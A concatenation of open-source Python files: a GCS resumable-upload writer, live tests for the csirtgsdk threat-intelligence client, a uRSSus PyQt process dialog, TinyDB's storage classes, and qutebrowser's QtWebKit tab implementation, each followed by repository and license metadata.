Raises:
IOError: When this location can not be found.
"""
assert self._maxrequestsize > self._blocksize
assert self._maxrequestsize % self._blocksize == 0
assert self._maxrequestsize >= self._flushsize
self._api = api
self._path = path
self.name = api_utils._unquote_filename(path)
self.closed = False
self._buffer = collections.deque()
self._buffered = 0
self._written = 0
self._offset = 0
headers = {'x-goog-resumable': 'start'}
if content_type:
headers['content-type'] = content_type
if gcs_headers:
headers.update(gcs_headers)
status, resp_headers, content = self._api.post_object(path, headers=headers)
errors.check_status(status, [201], path, headers, resp_headers,
body=content)
loc = resp_headers.get('location')
if not loc:
raise IOError('No location header found in 201 response')
parsed = urlparse.urlparse(loc)
self._path_with_token = '%s?%s' % (self._path, parsed.query)
def __getstate__(self):
"""Store state as part of serialization/pickling.
The contents of the write buffer are stored. Writes to the underlying
storage are required to be on block boundaries (_blocksize) except for the
last write. In the worst case the pickled version of this object may be
slightly larger than the blocksize.
Returns:
A dictionary with the state of this object
"""
return {'api': self._api,
'path': self._path,
'path_token': self._path_with_token,
'buffer': self._buffer,
'buffered': self._buffered,
'written': self._written,
'offset': self._offset,
'closed': self.closed}
def __setstate__(self, state):
"""Restore state as part of deserialization/unpickling.
Args:
state: the dictionary from a __getstate__ call
"""
self._api = state['api']
self._path_with_token = state['path_token']
self._buffer = state['buffer']
self._buffered = state['buffered']
self._written = state['written']
self._offset = state['offset']
self.closed = state['closed']
self._path = state['path']
self.name = api_utils._unquote_filename(self._path)
def write(self, data):
"""Write some bytes.
Args:
data: data to write. str.
Raises:
TypeError: if data is not of type str.
"""
self._check_open()
if not isinstance(data, str):
raise TypeError('Expected str but got %s.' % type(data))
if not data:
return
self._buffer.append(data)
self._buffered += len(data)
self._offset += len(data)
if self._buffered >= self._flushsize:
self._flush()
def flush(self):
"""Flush as much as possible to GCS.
GCS *requires* that all writes except for the final one align on
256KB boundaries. So the internal buffer may still have < 256KB bytes left
after flush.
"""
self._check_open()
self._flush(finish=False)
def tell(self):
"""Return the total number of bytes passed to write() so far.
(There is no seek() method.)
"""
return self._offset
def close(self):
"""Flush the buffer and finalize the file.
When this returns the new file is available for reading.
"""
if not self.closed:
self.closed = True
self._flush(finish=True)
self._buffer = None
def __enter__(self):
return self
def __exit__(self, atype, value, traceback):
self.close()
return False
def _flush(self, finish=False):
"""Internal API to flush.
Buffer is flushed to GCS only when the total amount of buffered data is at
least self._blocksize, or to flush the final (incomplete) block of
the file with finish=True.
"""
while ((finish and self._buffered >= 0) or
(not finish and self._buffered >= self._blocksize)):
tmp_buffer = []
tmp_buffer_len = 0
excess = 0
while self._buffer:
buf = self._buffer.popleft()
size = len(buf)
self._buffered -= size
tmp_buffer.append(buf)
tmp_buffer_len += size
if tmp_buffer_len >= self._maxrequestsize:
excess = tmp_buffer_len - self._maxrequestsize
break
if not finish and (
tmp_buffer_len % self._blocksize + self._buffered <
self._blocksize):
excess = tmp_buffer_len % self._blocksize
break
if excess:
over = tmp_buffer.pop()
size = len(over)
assert size >= excess
tmp_buffer_len -= size
head, tail = over[:-excess], over[-excess:]
self._buffer.appendleft(tail)
self._buffered += len(tail)
if head:
tmp_buffer.append(head)
tmp_buffer_len += len(head)
data = ''.join(tmp_buffer)
file_len = '*'
if finish and not self._buffered:
file_len = self._written + len(data)
self._send_data(data, self._written, file_len)
self._written += len(data)
if file_len != '*':
break
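# Illustration of the alignment rule enforced above (assumed figures): with
# _blocksize = 256KB, a non-final flush of 300KB uploads exactly 256KB and
# keeps the trailing 44KB buffered, so every intermediate PUT starts on a
# 256KB boundary as GCS requires; only the finish=True flush may send a
# short tail.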
def _send_data(self, data, start_offset, file_len):
"""Send the block to the storage service.
This is a utility method that does not modify self.
Args:
data: data to send in str.
start_offset: start offset of the data in relation to the file.
file_len: an int if this is the last data to append to the file.
Otherwise '*'.
"""
headers = {}
end_offset = start_offset + len(data) - 1
if data:
headers['content-range'] = ('bytes %d-%d/%s' %
(start_offset, end_offset, file_len))
else:
headers['content-range'] = ('bytes */%s' % file_len)
status, response_headers, content = self._api.put_object(
self._path_with_token, payload=data, headers=headers)
if file_len == '*':
expected = 308
else:
expected = 200
errors.check_status(status, [expected], self._path, headers,
response_headers, content,
{'upload_path': self._path_with_token})
def _get_offset_from_gcs(self):
"""Get the last offset that has been written to GCS.
This is a utility method that does not modify self.
Returns:
an int of the last offset written to GCS by this upload, inclusive.
-1 means nothing has been written.
"""
headers = {'content-range': 'bytes */*'}
status, response_headers, content = self._api.put_object(
self._path_with_token, headers=headers)
errors.check_status(status, [308], self._path, headers,
response_headers, content,
{'upload_path': self._path_with_token})
val = response_headers.get('range')
if val is None:
return -1
_, offset = val.rsplit('-', 1)
return int(offset)
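# Example of the header round-trip above (hypothetical values): a 308
# response with 'range: bytes=0-262143' yields 262143, i.e. the first 256KB
# block is already stored; a response with no 'range' header yields -1.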
def _force_close(self, file_length=None):
"""Close this buffer on file_length.
Finalize this upload immediately on file_length.
Contents that are still in memory will not be uploaded.
This is a utility method that does not modify self.
Args:
file_length: file length. Must match what has been uploaded. If None,
it will be queried from GCS.
"""
if file_length is None:
file_length = self._get_offset_from_gcs() + 1
self._send_data('', 0, file_length)
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return False
def readable(self):
return False
def writable(self):
return True
|
apache-2.0
|
csirtgadgets/py-csirtgsdk
|
test/test_search_live.py
|
3
|
5086
|
import pytest
import os
from time import sleep
from csirtgsdk.indicator import Indicator
from csirtgsdk.feed import Feed
from csirtgsdk.client.http import HTTP as Client
from csirtgsdk.search import Search
CI_BUILD = os.environ.get('CI_BUILD', False)
TOKEN = os.environ.get('CSIRTG_TOKEN', None)
USER = os.environ.get('CSIRTG_USER', 'wes')
REMOTE = os.environ.get('CSIRTG_REMOTE', 'https://csirtg.io/api')
FEED = os.environ.get('CSIRTG_TEST_FEED', 'ci_search_test')
liveonly = pytest.mark.skipif(CI_BUILD is False, reason="CI_BUILD env var not set")
@pytest.fixture
def client():
return Client(
token=TOKEN,
remote=REMOTE
)
@liveonly
def test_indicator_search_fqdn(client):
sleep(3)
INDICATOR = 'example123123123.com'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['updated_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'fqdn'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_ipv4(client):
sleep(3)
INDICATOR = '1.1.1.1'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'ipv4'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_ipv6(client):
sleep(3)
INDICATOR = '2001:4860:4860::8888'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'ipv6'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_email(client):
sleep(3)
INDICATOR = '[email protected]'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'email'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_url(client):
sleep(3)
INDICATOR = 'http://www.example.com/test/index.html'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'uri'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
|
lgpl-3.0
|
Alwnikrotikz/urssus
|
urssus/processdialog.py
|
4
|
2232
|
# -*- coding: utf-8 -*-
# uRSSus, a multiplatform GUI news agregator
# Copyright (C) 2008 Roberto Alsina
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 2 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from PyQt4 import QtGui, QtCore
import multiprocessing
from ui.Ui_runprocess import Ui_Dialog as UI_ProcessDialog
class ProcessDialog(QtGui.QDialog):
def __init__(self, parent, callable, args):
QtGui.QDialog.__init__(self, parent)
# Set up the UI from designer
self.ui=UI_ProcessDialog()
self.ui.setupUi(self)
self.output=multiprocessing.Queue()
self.callable=callable
self.args=args+[self.output]
self.timer=QtCore.QTimer(self)
QtCore.QObject.connect(self.timer, QtCore.SIGNAL("timeout()"), self.showOutput)
self.proc=None
def exec_(self):
self.show()
self.start()
return QtGui.QDialog.exec_(self)
def start(self):
self.proc=multiprocessing.Process(target=self.callable, args=self.args)
self.proc.start()
self.showOutput()
def reject(self):
if self.proc and self.proc.is_alive():
self.proc.terminate()
return QtGui.QDialog.reject(self)
def showOutput(self):
while not self.output.empty():
[code, data]=self.output.get()
if code==0: # Regular output
self.ui.output.append(data+'<br>')
elif code==1:
self.ui.output.append('<b>'+data+'</b><br>')
elif code==2: # Really bad
QtGui.QMessageBox.critical(self, 'Error - uRSSus', data )
self.reject()
elif code==100: # The result data
self.result=data
self.accept()
if self.proc.is_alive():
self.timer.setInterval(500)
self.timer.start()
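# Hedged usage sketch (hypothetical worker; a QApplication must exist): the
# last queue message decides the dialog's fate, e.g. a worker ends with
# output.put([100, result]) so exec_() returns Accepted with the result
# stored on the dialog.
#   def worker(arg, output):
#       output.put([0, 'working...'])
#       output.put([100, arg * 2])
#   dlg = ProcessDialog(None, worker, [21])
#   dlg.exec_()   # runs worker in a separate process; dlg.result == 42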
|
lgpl-2.1
|
jorgeslima/files_copier
|
dependencies/tinydb/tinydb/storages.py
|
2
|
2980
|
"""
Contains the :class:`base class <tinydb.storages.Storage>` for storages and
implementations.
"""
from abc import ABCMeta, abstractmethod
import os
from .utils import with_metaclass
try:
import ujson as json
except ImportError:
import json
def touch(fname, create_dirs):
if create_dirs:
base_dir = os.path.dirname(fname)
if not os.path.exists(base_dir):
os.makedirs(base_dir)
with open(fname, 'a'):
os.utime(fname, None)
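# A small usage sketch (assumed filenames, for illustration only):
#   touch('data/db.json', create_dirs=True)   # creates data/ and an empty file
#   touch('db.json', create_dirs=False)       # creates the file / updates mtime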
class Storage(with_metaclass(ABCMeta, object)):
"""
The abstract base class for all Storages.
A Storage (de)serializes the current state of the database and stores it in
some place (memory, file on disk, ...).
"""
# Using ABCMeta as metaclass allows instantiating only storages that have
# implemented read and write
@abstractmethod
def read(self):
"""
Read the last stored state.
Any kind of deserialization should go here.
Return ``None`` here to indicate that the storage is empty.
:rtype: dict
"""
raise NotImplementedError('To be overridden!')
@abstractmethod
def write(self, data):
"""
Write the current state of the database to the storage.
Any kind of serialization should go here.
:param data: The current state of the database.
:type data: dict
"""
raise NotImplementedError('To be overridden!')
def close(self):
"""
Optional: Close open file handles, etc.
"""
pass
class JSONStorage(Storage):
"""
Store the data in a JSON file.
"""
def __init__(self, path, create_dirs=False, **kwargs):
"""
Create a new instance.
Also creates the storage file, if it doesn't exist.
:param path: Where to store the JSON data.
:type path: str
"""
super(JSONStorage, self).__init__()
touch(path, create_dirs=create_dirs) # Create file if not exists
self.kwargs = kwargs
self._handle = open(path, 'r+')
def close(self):
self._handle.close()
def read(self):
# Get the file size
self._handle.seek(0, os.SEEK_END)
size = self._handle.tell()
if not size:
# File is empty
return None
else:
self._handle.seek(0)
return json.load(self._handle)
def write(self, data):
self._handle.seek(0)
serialized = json.dumps(data, **self.kwargs)
self._handle.write(serialized)
self._handle.flush()
self._handle.truncate()
class MemoryStorage(Storage):
"""
Store the data as JSON in memory.
"""
def __init__(self):
"""
Create a new instance.
"""
super(MemoryStorage, self).__init__()
self.memory = None
def read(self):
return self.memory
def write(self, data):
self.memory = data
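# Hedged end-to-end sketch of the Storage contract defined above:
#   storage = JSONStorage('db.json')       # or MemoryStorage()
#   assert storage.read() is None          # empty storage reads as None
#   storage.write({'_default': {}})
#   assert storage.read() == {'_default': {}}
#   storage.close()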
|
mit
|
lahwaacz/qutebrowser
|
qutebrowser/browser/webkit/webkittab.py
|
1
|
27974
|
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2017 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Wrapper over our (QtWebKit) WebView."""
import sys
import functools
import xml.etree.ElementTree
import sip
from PyQt5.QtCore import (pyqtSlot, Qt, QEvent, QUrl, QPoint, QTimer, QSizeF,
QSize)
from PyQt5.QtGui import QKeyEvent
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWebKitWidgets import QWebPage, QWebFrame
from PyQt5.QtWebKit import QWebSettings
from PyQt5.QtPrintSupport import QPrinter
from qutebrowser.browser import browsertab
from qutebrowser.browser.network import proxy
from qutebrowser.browser.webkit import webview, tabhistory, webkitelem
from qutebrowser.browser.webkit.network import webkitqutescheme
from qutebrowser.utils import qtutils, objreg, usertypes, utils, log, debug
def init():
"""Initialize QtWebKit-specific modules."""
qapp = QApplication.instance()
if not qtutils.version_check('5.8'):
# Otherwise we initialize it globally in app.py
log.init.debug("Initializing proxy...")
proxy.init()
log.init.debug("Initializing js-bridge...")
js_bridge = webkitqutescheme.JSBridge(qapp)
objreg.register('js-bridge', js_bridge)
class WebKitAction(browsertab.AbstractAction):
"""QtWebKit implementations related to web actions."""
action_class = QWebPage
action_base = QWebPage.WebAction
def exit_fullscreen(self):
raise browsertab.UnsupportedOperationError
def save_page(self):
"""Save the current page."""
raise browsertab.UnsupportedOperationError
class WebKitPrinting(browsertab.AbstractPrinting):
"""QtWebKit implementations related to printing."""
def _do_check(self):
if not qtutils.check_print_compat():
# WORKAROUND (remove this when we bump the requirements to 5.3.0)
raise browsertab.WebTabError(
"Printing on Qt < 5.3.0 on Windows is broken, please upgrade!")
def check_pdf_support(self):
self._do_check()
def check_printer_support(self):
self._do_check()
def check_preview_support(self):
self._do_check()
def to_pdf(self, filename):
printer = QPrinter()
printer.setOutputFileName(filename)
self.to_printer(printer)
def to_printer(self, printer, callback=None):
self._widget.print(printer)
# Can't find out whether there was an error...
if callback is not None:
callback(True)
class WebKitSearch(browsertab.AbstractSearch):
"""QtWebKit implementations related to searching on the page."""
def __init__(self, parent=None):
super().__init__(parent)
self._flags = QWebPage.FindFlags(0)
def _call_cb(self, callback, found, text, flags, caller):
"""Call the given callback if it's non-None.
Delays the call via a QTimer so the website is re-rendered in between.
Args:
callback: What to call
found: If the text was found
text: The text searched for
flags: The flags searched with
caller: Name of the caller.
"""
found_text = 'found' if found else "didn't find"
# Removing FindWrapsAroundDocument to get the same logging as with
# QtWebEngine
debug_flags = debug.qflags_key(
QWebPage, flags & ~QWebPage.FindWrapsAroundDocument,
klass=QWebPage.FindFlag)
if debug_flags != '0x0000':
flag_text = 'with flags {}'.format(debug_flags)
else:
flag_text = ''
log.webview.debug(' '.join([caller, found_text, text, flag_text])
.strip())
if callback is not None:
QTimer.singleShot(0, functools.partial(callback, found))
def clear(self):
self.search_displayed = False
# We first clear the marked text, then the highlights
self._widget.findText('')
self._widget.findText('', QWebPage.HighlightAllOccurrences)
def search(self, text, *, ignore_case=False, reverse=False,
result_cb=None):
self.search_displayed = True
flags = QWebPage.FindWrapsAroundDocument
if ignore_case == 'smart':
if not text.islower():
flags |= QWebPage.FindCaseSensitively
elif not ignore_case:
flags |= QWebPage.FindCaseSensitively
if reverse:
flags |= QWebPage.FindBackward
# We actually search *twice* - once to highlight everything, then again
# to get a mark so we can navigate.
found = self._widget.findText(text, flags)
self._widget.findText(text, flags | QWebPage.HighlightAllOccurrences)
self.text = text
self._flags = flags
self._call_cb(result_cb, found, text, flags, 'search')
def next_result(self, *, result_cb=None):
self.search_displayed = True
found = self._widget.findText(self.text, self._flags)
self._call_cb(result_cb, found, self.text, self._flags, 'next_result')
def prev_result(self, *, result_cb=None):
self.search_displayed = True
# The int() here makes sure we get a copy of the flags.
flags = QWebPage.FindFlags(int(self._flags))
if flags & QWebPage.FindBackward:
flags &= ~QWebPage.FindBackward
else:
flags |= QWebPage.FindBackward
found = self._widget.findText(self.text, flags)
self._call_cb(result_cb, found, self.text, flags, 'prev_result')
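# Illustrative note (not qutebrowser code): search() above deliberately calls
# findText() twice - the first call, without HighlightAllOccurrences, places
# the "current match" marker that next_result()/prev_result() navigate from;
# the second, with HighlightAllOccurrences, only paints the highlights.
# prev_result() copies the stored flags via QWebPage.FindFlags(int(...)) so
# toggling FindBackward on the copy never mutates the saved search direction.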
class WebKitCaret(browsertab.AbstractCaret):
"""QtWebKit implementations related to moving the cursor/selection."""
@pyqtSlot(usertypes.KeyMode)
def _on_mode_entered(self, mode):
if mode != usertypes.KeyMode.caret:
return
settings = self._widget.settings()
settings.setAttribute(QWebSettings.CaretBrowsingEnabled, True)
self.selection_enabled = bool(self.selection())
if self._widget.isVisible():
# Sometimes the caret isn't immediately visible, but unfocusing
# and refocusing it fixes that.
self._widget.clearFocus()
self._widget.setFocus(Qt.OtherFocusReason)
# Move the caret to the first element in the viewport if there
# isn't any text which is already selected.
#
# Note: We can't use hasSelection() here, as that's always
# true in caret mode.
if not self.selection():
self._widget.page().currentFrame().evaluateJavaScript(
utils.read_file('javascript/position_caret.js'))
@pyqtSlot()
def _on_mode_left(self):
settings = self._widget.settings()
if settings.testAttribute(QWebSettings.CaretBrowsingEnabled):
if self.selection_enabled and self._widget.hasSelection():
# Remove selection if it exists
self._widget.triggerPageAction(QWebPage.MoveToNextChar)
settings.setAttribute(QWebSettings.CaretBrowsingEnabled, False)
self.selection_enabled = False
def move_to_next_line(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToNextLine
else:
act = QWebPage.SelectNextLine
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_prev_line(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToPreviousLine
else:
act = QWebPage.SelectPreviousLine
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_next_char(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToNextChar
else:
act = QWebPage.SelectNextChar
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_prev_char(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToPreviousChar
else:
act = QWebPage.SelectPreviousChar
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_end_of_word(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextWord]
if sys.platform == 'win32': # pragma: no cover
act.append(QWebPage.MoveToPreviousChar)
else:
act = [QWebPage.SelectNextWord]
if sys.platform == 'win32': # pragma: no cover
act.append(QWebPage.SelectPreviousChar)
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_next_word(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextWord]
if sys.platform != 'win32': # pragma: no branch
act.append(QWebPage.MoveToNextChar)
else:
act = [QWebPage.SelectNextWord]
if sys.platform != 'win32': # pragma: no branch
act.append(QWebPage.SelectNextChar)
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_prev_word(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToPreviousWord
else:
act = QWebPage.SelectPreviousWord
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_start_of_line(self):
if not self.selection_enabled:
act = QWebPage.MoveToStartOfLine
else:
act = QWebPage.SelectStartOfLine
self._widget.triggerPageAction(act)
def move_to_end_of_line(self):
if not self.selection_enabled:
act = QWebPage.MoveToEndOfLine
else:
act = QWebPage.SelectEndOfLine
self._widget.triggerPageAction(act)
def move_to_start_of_next_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextLine,
QWebPage.MoveToStartOfBlock]
else:
act = [QWebPage.SelectNextLine,
QWebPage.SelectStartOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_start_of_prev_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToPreviousLine,
QWebPage.MoveToStartOfBlock]
else:
act = [QWebPage.SelectPreviousLine,
QWebPage.SelectStartOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_end_of_next_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextLine,
QWebPage.MoveToEndOfBlock]
else:
act = [QWebPage.SelectNextLine,
QWebPage.SelectEndOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_end_of_prev_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToPreviousLine, QWebPage.MoveToEndOfBlock]
else:
act = [QWebPage.SelectPreviousLine, QWebPage.SelectEndOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_start_of_document(self):
if not self.selection_enabled:
act = QWebPage.MoveToStartOfDocument
else:
act = QWebPage.SelectStartOfDocument
self._widget.triggerPageAction(act)
def move_to_end_of_document(self):
if not self.selection_enabled:
act = QWebPage.MoveToEndOfDocument
else:
act = QWebPage.SelectEndOfDocument
self._widget.triggerPageAction(act)
def toggle_selection(self):
self.selection_enabled = not self.selection_enabled
mainwindow = objreg.get('main-window', scope='window',
window=self._win_id)
mainwindow.status.set_mode_active(usertypes.KeyMode.caret, True)
def drop_selection(self):
self._widget.triggerPageAction(QWebPage.MoveToNextChar)
def has_selection(self):
return self._widget.hasSelection()
def selection(self, html=False):
if html:
return self._widget.selectedHtml()
return self._widget.selectedText()
def follow_selected(self, *, tab=False):
if not self.has_selection():
return
if QWebSettings.globalSettings().testAttribute(
QWebSettings.JavascriptEnabled):
if tab:
self._tab.data.override_target = usertypes.ClickTarget.tab
self._tab.run_js_async(
'window.getSelection().anchorNode.parentNode.click()')
else:
selection = self.selection(html=True)
try:
selected_element = xml.etree.ElementTree.fromstring(
'<html>{}</html>'.format(selection)).find('a')
except xml.etree.ElementTree.ParseError:
raise browsertab.WebTabError('Could not parse selected '
'element!')
if selected_element is not None:
try:
url = selected_element.attrib['href']
except KeyError:
raise browsertab.WebTabError('Anchor element without '
'href!')
url = self._tab.url().resolved(QUrl(url))
if tab:
self._tab.new_tab_requested.emit(url)
else:
self._tab.openurl(url)
class WebKitZoom(browsertab.AbstractZoom):
"""QtWebKit implementations related to zooming."""
def _set_factor_internal(self, factor):
self._widget.setZoomFactor(factor)
def factor(self):
return self._widget.zoomFactor()
class WebKitScroller(browsertab.AbstractScroller):
"""QtWebKit implementations related to scrolling."""
# FIXME:qtwebengine When to use the main frame, when the current one?
def pos_px(self):
return self._widget.page().mainFrame().scrollPosition()
def pos_perc(self):
return self._widget.scroll_pos
def to_point(self, point):
self._widget.page().mainFrame().setScrollPosition(point)
def delta(self, x=0, y=0):
qtutils.check_overflow(x, 'int')
qtutils.check_overflow(y, 'int')
self._widget.page().mainFrame().scroll(x, y)
def delta_page(self, x=0.0, y=0.0):
if y.is_integer():
y = int(y)
if y == 0:
pass
elif y < 0:
self.page_up(count=-y)
elif y > 0:
self.page_down(count=y)
y = 0
if x == 0 and y == 0:
return
size = self._widget.page().mainFrame().geometry()
self.delta(x * size.width(), y * size.height())
def to_perc(self, x=None, y=None):
if x is None and y == 0:
self.top()
elif x is None and y == 100:
self.bottom()
else:
for val, orientation in [(x, Qt.Horizontal), (y, Qt.Vertical)]:
if val is not None:
val = qtutils.check_overflow(val, 'int', fatal=False)
frame = self._widget.page().mainFrame()
m = frame.scrollBarMaximum(orientation)
if m == 0:
continue
frame.setScrollBarValue(orientation, int(m * val / 100))
def _key_press(self, key, count=1, getter_name=None, direction=None):
frame = self._widget.page().mainFrame()
getter = None if getter_name is None else getattr(frame, getter_name)
# FIXME:qtwebengine needed?
# self._widget.setFocus()
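        # Note (assumption): min(count, 5000) below presumably caps runaway
        # repeat counts so a huge count cannot hang this synchronous loop.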
for _ in range(min(count, 5000)):
# Abort scrolling if the minimum/maximum was reached.
if (getter is not None and
frame.scrollBarValue(direction) == getter(direction)):
return
self._tab.key_press(key)
def up(self, count=1):
self._key_press(Qt.Key_Up, count, 'scrollBarMinimum', Qt.Vertical)
def down(self, count=1):
self._key_press(Qt.Key_Down, count, 'scrollBarMaximum', Qt.Vertical)
def left(self, count=1):
self._key_press(Qt.Key_Left, count, 'scrollBarMinimum', Qt.Horizontal)
def right(self, count=1):
self._key_press(Qt.Key_Right, count, 'scrollBarMaximum', Qt.Horizontal)
def top(self):
self._key_press(Qt.Key_Home)
def bottom(self):
self._key_press(Qt.Key_End)
def page_up(self, count=1):
self._key_press(Qt.Key_PageUp, count, 'scrollBarMinimum', Qt.Vertical)
def page_down(self, count=1):
self._key_press(Qt.Key_PageDown, count, 'scrollBarMaximum',
Qt.Vertical)
def at_top(self):
return self.pos_px().y() == 0
def at_bottom(self):
frame = self._widget.page().currentFrame()
return self.pos_px().y() >= frame.scrollBarMaximum(Qt.Vertical)
class WebKitHistory(browsertab.AbstractHistory):
"""QtWebKit implementations related to page history."""
def current_idx(self):
return self._history.currentItemIndex()
def back(self):
self._history.back()
def forward(self):
self._history.forward()
def can_go_back(self):
return self._history.canGoBack()
def can_go_forward(self):
return self._history.canGoForward()
def serialize(self):
return qtutils.serialize(self._history)
def deserialize(self, data):
return qtutils.deserialize(data, self._history)
def load_items(self, items):
stream, _data, user_data = tabhistory.serialize(items)
qtutils.deserialize_stream(stream, self._history)
for i, data in enumerate(user_data):
self._history.itemAt(i).setUserData(data)
cur_data = self._history.currentItem().userData()
if cur_data is not None:
if 'zoom' in cur_data:
self._tab.zoom.set_factor(cur_data['zoom'])
if ('scroll-pos' in cur_data and
self._tab.scroller.pos_px() == QPoint(0, 0)):
QTimer.singleShot(0, functools.partial(
self._tab.scroller.to_point, cur_data['scroll-pos']))
class WebKitElements(browsertab.AbstractElements):
"""QtWebKit implemementations related to elements on the page."""
def find_css(self, selector, callback, *, only_visible=False):
mainframe = self._widget.page().mainFrame()
if mainframe is None:
raise browsertab.WebTabError("No frame focused!")
elems = []
frames = webkitelem.get_child_frames(mainframe)
for f in frames:
for elem in f.findAllElements(selector):
elems.append(webkitelem.WebKitElement(elem, tab=self._tab))
if only_visible:
# pylint: disable=protected-access
elems = [e for e in elems if e._is_visible(mainframe)]
# pylint: enable=protected-access
callback(elems)
def find_id(self, elem_id, callback):
def find_id_cb(elems):
if not elems:
callback(None)
else:
callback(elems[0])
self.find_css('#' + elem_id, find_id_cb)
def find_focused(self, callback):
frame = self._widget.page().currentFrame()
if frame is None:
callback(None)
return
elem = frame.findFirstElement('*:focus')
if elem.isNull():
callback(None)
else:
callback(webkitelem.WebKitElement(elem, tab=self._tab))
def find_at_pos(self, pos, callback):
assert pos.x() >= 0
assert pos.y() >= 0
frame = self._widget.page().frameAt(pos)
if frame is None:
# This happens when we click inside the webview, but not actually
# on the QWebPage - for example when clicking the scrollbar
# sometimes.
log.webview.debug("Hit test at {} but frame is None!".format(pos))
callback(None)
return
# You'd think we have to subtract frame.geometry().topLeft() from the
# position, but it seems QWebFrame::hitTestContent wants a position
# relative to the QWebView, not to the frame. This makes no sense to
# me, but it works this way.
hitresult = frame.hitTestContent(pos)
if hitresult.isNull():
# For some reason, the whole hit result can be null sometimes (e.g.
# on doodle menu links).
log.webview.debug("Hit test result is null!")
callback(None)
return
try:
elem = webkitelem.WebKitElement(hitresult.element(), tab=self._tab)
except webkitelem.IsNullError:
# For some reason, the hit result element can be a null element
# sometimes (e.g. when clicking the timetable fields on
# http://www.sbb.ch/ ).
log.webview.debug("Hit test result element is null!")
callback(None)
return
callback(elem)
